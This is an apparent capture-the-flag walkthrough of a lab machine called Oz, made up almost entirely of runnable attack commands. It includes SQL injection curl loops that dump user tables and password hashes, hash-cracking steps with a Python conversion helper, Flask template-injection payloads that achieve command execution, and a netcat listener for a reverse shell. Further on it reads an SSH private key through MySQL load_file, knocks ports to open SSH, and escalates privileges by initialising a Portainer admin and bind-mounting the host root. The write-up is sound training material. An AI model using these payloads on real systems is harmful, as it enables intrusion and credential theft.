nmap -A -p- -oA oz 10.129.29.198 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA oz 10.129.29.198

nmap -sU -O -p- -oA oz-udp 10.129.29.198

nikto -h 10.129.29.198:80


whatweb http://10.129.29.198

whatweb http://10.129.29.198:8080

We browse to http://10.129.29.198 (port 80).

We browse to http://10.129.29.198:8080.

We check http://10.129.29.198/robots.txt.

We browse to http://10.129.29.198/users/admin, which returns the user record as JSON (the "username" field is what the jq filters below pull out).

The path parameter is injectable; a UNION SELECT returns the MySQL version in the "username" field:

curl -s "http://10.129.29.198/users/%20union%20select%20version()--%20-"

List the tables of the ozdb schema one row at a time (LIMIT i,1):

for i in $(seq 0 10); do echo "[+] table [ozdb][$i]: $(curl -s "http://10.129.29.198/users/%20union%20select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22ozdb%22%20limit%20$i,1--%20-" | jq -r '.username')"; done

List the columns of the users_gbw table the same way:

for i in $(seq 0 10); do echo "[+] column [ozdb][users_gbw][$i]: $(curl -s "http://10.129.29.198/users/%20union%20select%20column_name%20from%20information_schema.columns%20where%20table_schema=%22ozdb%22%20and%20table_name=%22users_gbw%22%20limit%20$i,1--%20-" | jq -r '.username')"; done

Dump username:password pairs with GROUP_CONCAT (it aggregates every row into one comma-separated value, so no loop is needed; if the table is large, remember that group_concat_max_len defaults to 1024 bytes and the output gets truncated):

curl -s "http://10.129.29.198/users/%20union%20select%20group_concat(username,0x3a,password)%20from%20ozdb.users_gbw--%20-" | jq -r '.username'

We paste the output into a file called data and tidy it up (one username:hash pair per comma-separated entry).

tr ',' '\n' < data > hashes

cat hashes

john --wordlist=/usr/share/wordlists/rockyou.txt hashes


hashcat --example-hashes | grep "PBKDF2-HMAC-SHA256" -C 2


I tried to use hashcat and it did not work for me.

hashcat -m 10900 hashes /usr/share/wordlists/rockyou.txt

Mode 10900 (PBKDF2-HMAC-SHA256) expects each line as sha256:<iterations>:<base64 salt>:<base64 digest>, so hashes stored in the application's pbkdf2:sha256:<iterations>$<salt>$<hex> form have to be converted before hashcat will load them; the username:hash lines from the dump also need --username.
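An added helper (not part of the original notes) that converts a Werkzeug-style hash to the hashcat 10900 line format and verifies a candidate password locally. It assumes the stored hashes use the pbkdf2:sha256:<iterations>$<salt>$<hexdigest> layout; the sample hash, salt and iteration count below are constructed for the example (a low count so it runs quickly), not taken from the target.

```python
import base64
import hashlib
import hmac

# Constructed sample data: the password recovered on the page, hashed locally in
# Werkzeug's pbkdf2:sha256 format (assumption about the target's hash layout).
SAMPLE_PASSWORD = "wizardofoz22"
SAMPLE_SALT = "Z8q3rT1p"
SAMPLE_ITERATIONS = 1000


def make_werkzeug_hash(password, salt, iterations):
    """Build a 'pbkdf2:sha256:<iter>$<salt>$<hex>' string (used only to construct test data)."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2:sha256:{iterations}${salt}${digest.hex()}"


def parse_werkzeug_hash(stored):
    """Split 'pbkdf2:sha256:<iter>$<salt>$<hex>' into (iterations, salt, digest bytes)."""
    method, salt, hexdigest = stored.split("$", 2)
    parts = method.split(":")
    if len(parts) != 3 or parts[0] != "pbkdf2" or parts[1] != "sha256":
        raise ValueError(f"unsupported hash method: {method}")
    return int(parts[2]), salt, bytes.fromhex(hexdigest)


def to_hashcat_10900(stored):
    """Rewrite the hash as 'sha256:<iter>:<b64 salt>:<b64 digest>', the -m 10900 input format."""
    iterations, salt, digest = parse_werkzeug_hash(stored)
    b64 = lambda raw: base64.b64encode(raw).decode()
    return f"sha256:{iterations}:{b64(salt.encode())}:{b64(digest)}"


def convert_lines(lines):
    """Convert 'username:pbkdf2:sha256:...' dump lines; keeps the username so hashcat --username works."""
    out = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        user, _, stored = line.partition(":")  # first ':' separates user from the hash
        out.append(f"{user}:{to_hashcat_10900(stored)}")
    return out


def check_password(stored, candidate):
    """Recompute PBKDF2-HMAC-SHA256 for a candidate and compare in constant time."""
    iterations, salt, digest = parse_werkzeug_hash(stored)
    cand = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt.encode(), iterations, dklen=len(digest))
    return hmac.compare_digest(cand, digest)


def crack(stored, wordlist):
    """Minimal in-process dictionary attack; returns the matching word or None."""
    for word in wordlist:
        if check_password(stored, word):
            return word
    return None


SAMPLE_HASH = make_werkzeug_hash(SAMPLE_PASSWORD, SAMPLE_SALT, SAMPLE_ITERATIONS)

if __name__ == "__main__":
    # Convert a dump file as produced by the tr step above and write the hashcat input.
    # with open("hashes") as f: lines = f.readlines()
    lines = ["wizard.oz:" + SAMPLE_HASH]  # constructed stand-in for the 'hashes' file
    for converted in convert_lines(lines):
        print(converted)
    print(crack(SAMPLE_HASH, ["password", "dorothy", "wizardofoz22"]))
```

Write the converted lines to a file and run hashcat -m 10900 --username <file> /usr/share/wordlists/rockyou.txt; the in-process crack() is only for confirming a single candidate, since PBKDF2 with tens of thousands of iterations is far too slow to brute-force in pure Python.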

Credenciales-> wizard.oz:wizardofoz22


We log in at http://10.129.29.198:8080/login.

We see a ticketing system.

We use the SSTI technique from https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-writing-an-evil-config-file

We send these through Burp Suite (the underscores and brackets matter; index 40 is the built-in file class in the Python 2 interpreter this payload targets, so enumerate __subclasses__() first if the index differs on the target):

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}

{{ config.from_pyfile('/tmp/evilconfig.cfg') }}

{{ config['RUNCMD']('id', shell=True) }}

The first payload writes a config file that defines RUNCMD, the second loads it into the Flask config, and the third calls it with a command.

We then swap the command in the RUNCMD call for a bash reverse shell to our listener on port 443:

rlwrap nc -lvnp 443

We notice that we are inside a container.

cd /.secret

cat knockd.conf

knockd.conf gives the UDP port sequence that opens SSH on the host.

We find the database credentials in start.sh.

With those credentials we query the MySQL server reachable from the container:

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "show tables" mysql

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select User,Password from user" mysql

Hash the password we already have to see which mysql.user entries reuse it:

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select password('N0Pl4c3L1keH0me')" mysql

The account has the FILE privilege, so load_file() reads files off the database host (subject to secure_file_priv):

mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select load_file('/home/dorthi/.ssh/id_rsa')" mysql

We copy the key into id_rsa and fix it: in batch (-e) mode the mysql client escapes newlines as a literal \n, so we turn them back into real line breaks (alternatively, run mysql with -r/--raw so the output is not escaped in the first place).

sed -i 's/\\n/\n/g' id_rsa

/usr/share/john/ssh2john.py id_rsa > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash


rockyou.txt does not crack the key passphrase, so we create a file credentials.txt with the passwords we have found so far and try those.

john --wordlist=credentials.txt hash

Knock with the UDP sequence from knockd.conf, then SSH in with the key:

for port in 40809 50212 46969; do echo "test" | nc -u -w 1 10.129.29.198 $port; done; ssh -i id_rsa dorthi@10.129.29.198

nmap -p- --open -T5 -v -n 172.17.0.2

nmap -sCV -p9000 172.17.0.2

Port 9000 on 172.17.0.2 is a Portainer instance. We set up a port forward through the existing SSH session with the escape sequence:

  1. press Enter
  2. type ~C
  3. at the ssh> prompt, enter: -L 9000:172.17.0.2:9000

We follow the instructions the API gives us:

http "http://localhost:9000/api/auth" Username="admin" Password="password"

The first login attempt fails because no admin user has been initialised yet, so we initialise it ourselves and then authenticate:

http "http://localhost:9000/api/users/admin/init" Username="admin" Password="password"

http "http://localhost:9000/api/auth" Username="admin" Password="password"

We go to the menu and create a new container with the appropriate configuration.

We go to the Volumes tab and add a bind mount of the host's / into the container at /rootfs:

We click on >_console.

We choose /bin/sh and click connect.

cd rootfs

cd root && cat root.txt


copyright©2022 Cu3rv0x all rights reserved